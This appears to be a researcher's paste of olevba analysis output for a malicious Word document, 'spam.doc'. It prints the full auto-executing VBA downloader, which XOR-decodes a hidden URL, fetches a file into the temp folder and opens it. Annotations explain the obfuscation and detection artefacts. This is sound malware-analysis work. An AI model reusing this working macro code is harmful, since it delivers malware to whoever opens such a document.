dynamoo

Malicious Word macro

Apr 27th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- spam.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: spam.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: spam.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  ' Second hop of the auto-execution chain: autoopen -> NORMAND -> HARRIS (CLAY.bas).
  ' DEANDRE is never read; the argument only pads the call site.
  16. Sub NORMAND(DEANDRE As Long)
  17. HARRIS    ' continues the chain; HARRIS itself takes no arguments
  18. End Sub
  19.  
  ' Auto-executing entry point: Word runs autoopen() as soon as the document is
  ' opened (see the AutoExec row in the ANALYSIS table for this stream).
  ' The literal 378 is passed to NORMAND, which ignores it.
  20. Sub autoopen()
  21. NORMAND (378)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO PERCY.bas
  32. in file: spam.doc - OLE stream: u'Macros/VBA/PERCY'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35.  
  ' Thin wrapper around the string decoder SEYMOUR (CLAY.bas): decodes the hex
  ' string SCOTTIE with key LINDSEY. LUCIANO is doubled and then never used;
  ' every caller passes a literal (893, 4096), so the doubling has no effect.
  36. Public Function LUCIO(LUCIANO As Long, LINDSEY As String, SCOTTIE As String) As String
  37. LUCIANO = LUCIANO * 2
  38. LUCIO = SEYMOUR(LINDSEY, SCOTTIE)
  39.    
  40. End Function
  41.  
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. ANALYSIS:
  44. No suspicious keyword or IOC found.
  45. -------------------------------------------------------------------------------
  46. VBA MACRO CLAY.bas
  47. in file: spam.doc - OLE stream: u'Macros/VBA/CLAY'
  48. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  49.  
  ' 64-bit binding of wininet!InternetOpenA under the name SAMMIE; the 32-bit
  ' twin is declared in LAMAR.bas. EFRAIN (LAMAR.bas) calls it to obtain the
  ' WinINet session handle used by the download routine VALENTIN.
  50. #If VBA7 And Win64 Then
  51. Public Declare PtrSafe Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
  52. #End If
  ' Returns the GIOVANNI-th byte of the hex-encoded string WILMER: BERNIE (LAMAR.bas)
  ' extracts the two hex digits starting at character 2*GIOVANNI-1 and Val("&H..")
  ' converts them to a number. The leading 62 is ignored by BERNIE.
  53. Public Function GERMAN(ByRef WILMER As String, ByRef GIOVANNI As Long) As Integer
  54.  GERMAN = Val("&H" & (BERNIE(62, WILMER, FLETCHER(GIOVANNI), 2)))
  55. End Function
  ' Maps a 1-based byte index to the 1-based position of its first hex digit
  ' in a hex string (byte 1 -> char 1, byte 2 -> char 3, ...).
  56. Public Function FLETCHER(ByRef GIOVANNI As Long) As Long
  57.  FLETCHER = (2 * GIOVANNI) - 1
  58. End Function
  59.  
  60.  
  ' Core string decoder. WILMER is a hex-encoded byte string and HERSCHEL the XOR key:
  ' for byte i in 1..Len(WILMER)/2 the output character is
  '   Chr(hexbyte(i) Xor Asc(key[(i Mod Len(key)) + 1]))
  ' (GERMAN supplies hexbyte(i), LAVERNE the key byte; note the key is consumed
  ' starting from its second character because of the "+ 1").
  ' Every call site passes ELISEO ("COLEMANREFUGIO5", ROLANDO.bas) as the key and one
  ' of PARKER / LEMUEL / LAVERN / JULES as the payload, so those four constants are the
  ' only strings an analyst needs to decode to recover what the sample creates, writes
  ' and fetches.
  61. Public Function SEYMOUR(HERSCHEL As String, WILMER As String) As String
  62.    
  63.     Dim NUMBERS As Integer
  64.     Dim BUFORD As Integer
  65.    
  66.    
  67.     Dim SANFORD As Long
  68.  SANFORD = 221
  69. If SANFORD > SANFORD * 4 Then End    ' never true (221 > 884 is False); dead padding
  70.    
  71.     Dim GIOVANNI As Long
  72.     Dim BARNEY As String
  73.     For GIOVANNI = 1 To (LEOPOLDO(WILMER) / 2)    ' LEOPOLDO = Len; one iteration per encoded byte
  74.         NUMBERS = GERMAN(WILMER, GIOVANNI)    ' hex byte i
  75.         BUFORD = LAVERNE(HERSCHEL, GIOVANNI)    ' key byte for position i
  76.         BARNEY = BARNEY + BRANDEN(NUMBERS, BUFORD)    ' BRANDEN = Chr(a Xor b)
  77.     Next GIOVANNI
  78.    SEYMOUR = BARNEY
  79. End Function
  80.  
  81.  
  82.  
  ' Third hop of the call chain (NORMAND -> HARRIS -> FREDERIC). BERT is unused and the
  ' For loop is padding: adding 99 to the loop variable ends it after one pass.
  83. Public Sub HARRIS()
  84.         Dim BERT As Double
  85.  
  86.     Dim SILAS As Double
  87. For SILAS = 67 To 68
  88. SILAS = SILAS + 99
  89. Next SILAS
  90.  
  91. FREDERIC (5.09)    ' CORNELIUS.bas; the argument is ignored there
  92.  
  93. End Sub
  ' Fifth hop of the call chain (FREDERIC -> MERRILL -> RODRICK). The IRWIN string
  ' assignments are padding; the only real work is the call to RODRICK (ROLANDO.bas).
  ' MERLIN is never read and no return value is assigned.
  94. Public Function MERRILL(MERLIN As String)
  95. Dim IRWIN As String
  96. IRWIN = "KIRBY"
  97. RODRICK 44 + 0.33    ' argument is ignored by RODRICK
  98. IRWIN = IRWIN + "CRUZ"
  99. End Function
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  107. ANALYSIS:
  108. +------------+----------------+-----------------------------------------+
  109. | Type       | Keyword        | Description                             |
  110. +------------+----------------+-----------------------------------------+
  111. | Suspicious | Lib            | May run code from a DLL                 |
  112. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  113. |            |                | may be used to obfuscate strings        |
  114. |            |                | (option --decode to see all)            |
  115. | IOC        | wininet.dll    | Executable file name                    |
  116. +------------+----------------+-----------------------------------------+
  117. -------------------------------------------------------------------------------
  118. VBA MACRO ROLANDO.bas
  119. in file: spam.doc - OLE stream: u'Macros/VBA/ROLANDO'
  120. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  121.  
  ' Obfuscated string table. The four hex constants are decoded at runtime by
  ' SEYMOUR (CLAY.bas) with ELISEO as the XOR key; see the call sites noted per line.
  122. Public Const PARKER = "1C2420212D60133536392E2A2E412A2022"    ' decoded in JAMEL (DEXTER.bas) and passed to CreateObject
  123. Public Const LEMUEL = "13362C2A2C2F606B737B22312A"    ' decoded in HERSHEL (AMOS.bas); appended to the temp-folder path
  124. Public Const LAVERN = "2738313D7B617D33293C372A205B202A3E2B3E6F2D3D286963756676077461293D28"    ' decoded in JAMAR (DEXTER.bas); passed to InternetOpenUrlA as the URL
  125. Public Const JULES = "1C2F3724313A3B2B217B0120235010363F31282C01302F233633"    ' decoded in LAURENCE (DEXTER.bas) and passed to CreateObject
  126. Public Const ELISEO = "COLEMANREFUGIO5"    ' XOR key for all four strings above
  127.  
  128.  
  129.  
  ' Download-to-file routine. Opens a WinINet session (EFRAIN -> InternetOpenA), opens
  ' the decoded URL (JAMAR -> InternetOpenUrlA), reads the response in EFREN-byte (4800)
  ' chunks with InternetReadFile (BORIS), writes the accumulated bytes to the path MARQUIS
  ' with Open ... For Binary / Put, and closes both handles (DORIAN -> InternetCloseHandle).
  ' Returns True when at least one byte was accumulated. WYATT is never read.
  ' From a detection standpoint this is the wininet -> binary file write sequence that the
  ' ANALYSIS table for this stream flags (Open / Write / Put / Binary).
  130. Public Function VALENTIN(WYATT As Long, ByVal MARQUIS As String) As Boolean
  131.     #If VBA7 And Win64 Then
  132.         Dim LANNY As LongPtr, EZRA As LongPtr
  133.     #Else
  134.         Dim LANNY As Long, EZRA As Long
  135.     #End If
  136.     Dim SYDNEY As Long
  137.     Dim RUBIN As String * EFREN, EMILE As String    ' RUBIN: fixed-length 4800-char read buffer
  138.     Dim ARON As Integer, ELMO As Double
  139.     LANNY = EFRAIN    ' session handle (InternetOpenA)
  140.     If LANNY = 0 Then
  141.         Exit Function
  142.     End If
  143.     Dim KAREEM As Boolean
  144.    
  145.     If JAMAR(EZRA, LANNY) Then    ' JAMAR always returns True; EZRA receives the URL handle ByRef
  146.     End If
  147.     If EZRA = 0 Then
  148.         ELMO = 0
  149.     Else
  150.         BORIS EZRA, RUBIN, EFREN, SYDNEY    ' first read; SYDNEY = bytes read
  151.         EMILE = RUBIN    ' NOTE: appends the whole 4800-char buffer, not just SYDNEY bytes
  152.           Dim GAIL As Long
  153.           GAIL = 0
  154.           GAIL = GAIL + 21
  155. If GAIL > GAIL + 44 Then End    ' never true; padding
  156.         Do While SYDNEY <> 0
  157.             BORIS EZRA, RUBIN, EFREN, SYDNEY
  158.                     EMILE = EMILE + Mid(RUBIN, 1, SYDNEY)    ' later reads append only the bytes read
  159.         Loop
  160.              ELMO = LEOPOLDO(EMILE): _
  161.              ARON = EVERETTE("JOSEF")
  162.         Open MARQUIS _
  163.             For Binary Access Write _
  164.         Lock Write As #ARON    ' ARON = FreeFile (EVERETTE); ELMO = Len(EMILE)
  165.         Put #ARON, , EMILE
  166.         GAIL = GAIL + 62
  167.     If GAIL < 0 Then End    ' never true; padding
  168.         Close #ARON
  169.     End If
  170.     DORIAN EZRA    ' InternetCloseHandle on the URL handle
  171.     DORIAN LANNY    ' InternetCloseHandle on the session handle
  172.     EMILE = ""
  173.     If ELMO Then
  174.         VALENTIN = True
  175.     End If
  176. End Function
  177.  
  ' Sixth hop of the call chain (MERRILL -> RODRICK -> HERSHEL). The two For loops and the
  ' JERROD arithmetic are padding; the only real work is creating the object from the
  ' decoded JULES string (LAURENCE) and calling HERSHEL (AMOS.bas).
  ' The local "Dim LUCIO As Object" shadows the function LUCIO (PERCY.bas) inside this
  ' body; it starts as Nothing and is handed to HERSHEL ByRef, which replaces it.
  ' REINALDO is modified but never used by the caller.
  178. Public Function RODRICK(REINALDO As Double)
  179.  
  180. Dim LUCIO As Object
  181.  
  182.  
  183.     Dim JERROD As Long
  184. For JERROD = 17 To 21
  185. JERROD = JERROD + 33
  186. Next JERROD
  187.    
  188.  
  189. Dim WESTON  As Object
  190.  
  191.  
  192. For JERROD = 11 To 21
  193. JERROD = JERROD + 64
  194. Next JERROD
  195.    
  196.  
  197. Set WESTON = LAURENCE    ' CreateObject(decoded JULES); HERSHEL never reads this argument
  198. JERROD = JERROD + 42
  199. Dim LEWIS As Boolean
  200.  
  201. If JERROD > JERROD * 3 Then End    ' never true for positive JERROD; padding
  202. LEWIS = HERSHEL(LUCIO, WESTON)    ' download + open; result is not used
  203. REINALDO = REINALDO + 35
  204. End Function
  205.  
  206.  
  207. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  208. ANALYSIS:
  209. +------------+-------------+-----------------------------------------+
  210. | Type       | Keyword     | Description                             |
  211. +------------+-------------+-----------------------------------------+
  212. | Suspicious | Open        | May open a file                         |
  213. | Suspicious | Write       | May write to a file (if combined with   |
  214. |            |             | Open)                                   |
  215. | Suspicious | Put         | May write to a file (if combined with   |
  216. |            |             | Open)                                   |
  217. | Suspicious | Binary      | May read or write a binary file (if     |
  218. |            |             | combined with Open)                     |
  219. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  220. |            |             | be used to obfuscate strings (option    |
  221. |            |             | --decode to see all)                    |
  222. +------------+-------------+-----------------------------------------+
  223. -------------------------------------------------------------------------------
  224. VBA MACRO CORNELIUS.bas
  225. in file: spam.doc - OLE stream: u'Macros/VBA/CORNELIUS'
  226. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  227.  
  ' Only CORNELIUS.bas declares Option Explicit; DEXTER.bas relies on implicit
  ' declaration (see the undeclared MAJOR in JAMEL).
  228. Option Explicit
  229.  
  ' 64-bit binding of wininet!InternetReadFile under the name BORIS (32-bit twin in
  ' LAMAR.bas). CARSON is passed ByRef and receives the number of bytes read; VALENTIN
  ' (ROLANDO.bas) loops on it until it reaches 0.
  230. #If VBA7 And Win64 Then
  231. Public Declare PtrSafe Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  232. #End If
  233.  
  234.  
  235.  
  ' Parameters for the WinINet calls (see EFRAIN in LAMAR.bas and JAMAR in DEXTER.bas).
  236. Public Const EFREN = 4800    ' read-buffer size for InternetReadFile (VALENTIN)
  237. Public Const ANTWAN As String = "NIGEL"    ' first argument of InternetOpenA, i.e. the User-Agent sent on the wire; usable as a network signature
  238. Public Const ALDEN = 1    ' InternetOpenA access type; 1 corresponds to INTERNET_OPEN_TYPE_DIRECT
  239. Public Const MARGARITO = &H4000000    ' InternetOpenUrlA flags; value matches INTERNET_FLAG_NO_CACHE_WRITE
  240.  
  ' Fourth hop of the call chain (HARRIS -> FREDERIC -> MERRILL). SANTOS and the
  ' string literal are both ignored by the callee.
  241. Sub FREDERIC(SANTOS As Double)
  242.  
  243. MERRILL ("BLAIRLANDON")
  244. End Sub
  245.  
  ' One decoder step: XOR a data byte with a key byte and return it as a character.
  ' Called per byte from SEYMOUR (CLAY.bas).
  246. Public Function BRANDEN(ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
  247.     BRANDEN = Chr(NUMBERS Xor BUFORD)
  248. End Function
  249.  
  250.  
  251.  
  252.  
  253.  
  254. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  255. ANALYSIS:
  256. +------------+----------------+-----------------------------------------+
  257. | Type       | Keyword        | Description                             |
  258. +------------+----------------+-----------------------------------------+
  259. | Suspicious | Lib            | May run code from a DLL                 |
  260. | Suspicious | Chr            | May attempt to obfuscate specific       |
  261. |            |                | strings                                 |
  262. | Suspicious | Xor            | May attempt to obfuscate specific       |
  263. |            |                | strings                                 |
  264. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  265. |            |                | may be used to obfuscate strings        |
  266. |            |                | (option --decode to see all)            |
  267. | IOC        | wininet.dll    | Executable file name                    |
  268. +------------+----------------+-----------------------------------------+
  269. -------------------------------------------------------------------------------
  270. VBA MACRO LAMAR.bas
  271. in file: spam.doc - OLE stream: u'Macros/VBA/LAMAR'
  272. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  273.  
  274.  
  275.  
  276.  
  ' wininet.dll imports. On 64-bit VBA7 only InternetOpenUrlA is declared here (the other
  ' three live in CLAY.bas, CORNELIUS.bas and AMOS.bas); on 32-bit all four are declared
  ' in this block. JASPER is not referenced by any of the visible streams.
  277. Public Const JASPER = "RUSSEL"
  278. #If VBA7 And Win64 Then
  279. Public Declare PtrSafe Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
  280.  
  281. #Else
  282. Public Declare Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
  283. Public Declare Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
  284. Public Declare Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  285. Public Declare Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
  286. #End If
  287.  
  288.  
  ' Key-byte selector for the decoder: returns Asc of the key character at position
  ' (GIOVANNI Mod Len(HERSCHEL)) + 1, so the key is cycled starting at its second
  ' character. The leading 71 is ignored by BERNIE.
  289. Public Function LAVERNE(ByRef HERSCHEL As String, ByRef GIOVANNI As Long) As Integer
  290. LAVERNE = Asc(BERNIE(71, HERSCHEL, ((GIOVANNI Mod LEOPOLDO(HERSCHEL)) + 1), 1))
  291. End Function
  ' Substring helper: Mid$(JAYSON, NUMBERS, BUFORD). SAMMY is incremented and never
  ' read again; callers pass literals, so the ByRef write has no effect.
  292. Public Function BERNIE(SAMMY As Long, ByRef JAYSON As String, ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
  293.     BERNIE = Mid$(JAYSON, NUMBERS, BUFORD)
  294.     SAMMY = SAMMY + 31
  295. End Function
  ' Opens the WinINet session: InternetOpenA(ANTWAN, ALDEN, vbNullString, vbNullString, 0),
  ' i.e. User-Agent "NIGEL" and access type 1 (CORNELIUS.bas constants). The #If/#Else
  ' only switches the return type between LongPtr and Long; the body is shared.
  ' Returns 0 on failure, which VALENTIN checks before proceeding.
  296. #If VBA7 _
  297.     And Win64 Then
  298. Public Function EFRAIN() As LongPtr
  299.  #Else
  300. Public Function EFRAIN() As Long
  301.  
  302.  #End If
  303.  
  304.  EFRAIN = SAMMIE(ANTWAN, ALDEN, vbNullString, vbNullString, 0)
  305. End Function
  306.  
  307.  
  308.  
  309.  
  310.  
  311. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  312. ANALYSIS:
  313. +------------+----------------+-----------------------------------------+
  314. | Type       | Keyword        | Description                             |
  315. +------------+----------------+-----------------------------------------+
  316. | Suspicious | Lib            | May run code from a DLL                 |
  317. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  318. |            |                | may be used to obfuscate strings        |
  319. |            |                | (option --decode to see all)            |
  320. | IOC        | wininet.dll    | Executable file name                    |
  321. +------------+----------------+-----------------------------------------+
  322. -------------------------------------------------------------------------------
  323. VBA MACRO DEXTER.bas
  324. in file: spam.doc - OLE stream: u'Macros/VBA/DEXTER'
  325. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  326.  
  327.  
  ' Creates a COM object whose ProgID is only known at runtime: SEYMOUR decodes JULES with
  ' key ELISEO and the result goes straight into CreateObject. IGNACIO (AMOS.bas) later
  ' calls .GetSpecialFolder(2) on this object, which is consistent with a
  ' Scripting.FileSystemObject (2 = TemporaryFolder in that API) - confirm by decoding JULES.
  328. Public Function LAURENCE() As Object
  329. Dim ISMAEL As String
  330. ISMAEL = SEYMOUR(ELISEO, JULES)
  331. Set LAURENCE = CreateObject(ISMAEL)
  332. End Function
  333.  
  ' Alias for Len(); used by the decoder loop bound and the downloaded-length check.
  334. Public Function LEOPOLDO(JAYSON As String) As Long
  335. LEOPOLDO = Len(JAYSON)
  336. End Function
  337.  
  ' Final stage: creates a second runtime-named COM object (decoded PARKER) and calls its
  ' .Open method on LAZARO & ALPHONSE, i.e. the folder object concatenated with the decoded
  ' file name that VALENTIN just wrote to. MAJOR is never declared (this stream has no
  ' Option Explicit), RANDELL is unused, and the function never assigns its return value,
  ' so it yields False. Which object exposes .Open here is only known after decoding PARKER.
  338. Public Function JAMEL(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
  339.  
  340. Set MAJOR = CreateObject _
  341. (SEYMOUR _
  342. (ELISEO, PARKER))
  343. Dim DUSTY As Integer
  344. DUSTY = MAJOR.Open(LAZARO & ALPHONSE)
  345. End Function
  346.  
  347.  
  ' Opens the remote URL. GUADALUPE is the decoded LAVERN constant (key ELISEO); GRADY
  ' receives the InternetOpenUrlA handle ByRef (0 on failure), opened on session NOAH with
  ' flags MARGARITO (CORNELIUS.bas). Always returns True, so callers must inspect GRADY.
  ' The JACQUES loop is padding and exits after one pass.
  348. #If VBA7 And Win64 Then
  349.        Public Function JAMAR(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  350.     #Else
  351.        Public Function JAMAR(ByRef GRADY As Long, NOAH As Long) As Boolean
  352.     #End If
  353.         Dim JACQUES As Double
  354. Dim GUADALUPE As String
  355. Dim CLARK As Long
  356.     GUADALUPE = LUCIO(893, ELISEO, LAVERN)    ' decoded URL string
  357.  
  358. For JACQUES = 14 To 15
  359. JACQUES = JACQUES + 5.5
  360. Next JACQUES
  361.     GRADY = EUGENIO(NOAH, GUADALUPE, vbNullString, 0, MARGARITO, 0)    ' InternetOpenUrlA
  362.     JAMAR = True
  363. End Function
  364.  
  365.  
  366. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  367. ANALYSIS:
  368. +------------+--------------+--------------------------+
  369. | Type       | Keyword      | Description              |
  370. +------------+--------------+--------------------------+
  371. | Suspicious | CreateObject | May create an OLE object |
  372. | Suspicious | Open         | May open a file          |
  373. +------------+--------------+--------------------------+
  374. -------------------------------------------------------------------------------
  375. VBA MACRO AMOS.bas
  376. in file: spam.doc - OLE stream: u'Macros/VBA/AMOS'
  377. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  378.  
  379.  
  ' 64-bit binding of wininet!InternetCloseHandle under the name DORIAN (32-bit twin in
  ' LAMAR.bas). VALENTIN calls it twice to release the URL and session handles.
  380. #If VBA7 And Win64 Then
  381. Public Declare PtrSafe Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
  382. #End If
  383.  
  ' Orchestrates download and launch. Steps: (1) LAZARO is replaced ByRef with the special
  ' folder object returned by IGNACIO(LAURENCE) - GetSpecialFolder(2); (2) ALPHONSE is the
  ' decoded LEMUEL constant, used as the file name; (3) ADOLFO = folder & name is the
  ' destination path handed to VALENTIN, whose result is ignored; (4) JAMEL opens that path.
  ' HOMER is never read; the HARRISON loop is padding. The return value is JAMEL's, which is
  ' always False. The write target is therefore <special folder 2>\<decoded LEMUEL>, a useful
  ' host-based artefact to check for.
  384. Public Function HERSHEL(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
  385.  
  386. Dim HARRISON As Long
  387. Set LAZARO = IGNACIO(LAURENCE)    ' folder object; a fresh LAURENCE object is created here
  388.  
  389. Dim ADOLFO
  390.  
  391. Dim ALPHONSE As String
  392. ALPHONSE = LUCIO(4096, ELISEO, LEMUEL)    ' decoded file name
  393.  
  394. For HARRISON = 6 To 8
  395. HARRISON = HARRISON * 55
  396. Next HARRISON
  397. ADOLFO = LAZARO & ALPHONSE    ' "&" on the folder object uses its default property, presumably the path
  398.  
  399. If VALENTIN(354, ADOLFO) Then    ' download to ADOLFO; success flag discarded
  400. End If
  401.  
  402.  
  403. HERSHEL = JAMEL(LAZARO, ALPHONSE, 213)    ' open/launch the written file
  404.  
  405. End Function
  ' Returns a free VBA file number (FreeFile). JAYSON is never read.
  406. Public Function EVERETTE(JAYSON As String) As Integer
  407.     EVERETTE = FreeFile
  408. End Function
  409.  
  ' Calls NICHOLAS.GetSpecialFolder(2) on the object created by LAURENCE. The method name
  ' and argument match Scripting.FileSystemObject, where 2 selects the TemporaryFolder;
  ' confirm by decoding JULES.
  410. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
  411. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
  412. End Function
  413.  
  414. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  415. ANALYSIS:
  416. +------------+-------------+-------------------------+
  417. | Type       | Keyword     | Description             |
  418. +------------+-------------+-------------------------+
  419. | Suspicious | Lib         | May run code from a DLL |
  420. | IOC        | wininet.dll | Executable file name    |
  421. +------------+-------------+-------------------------+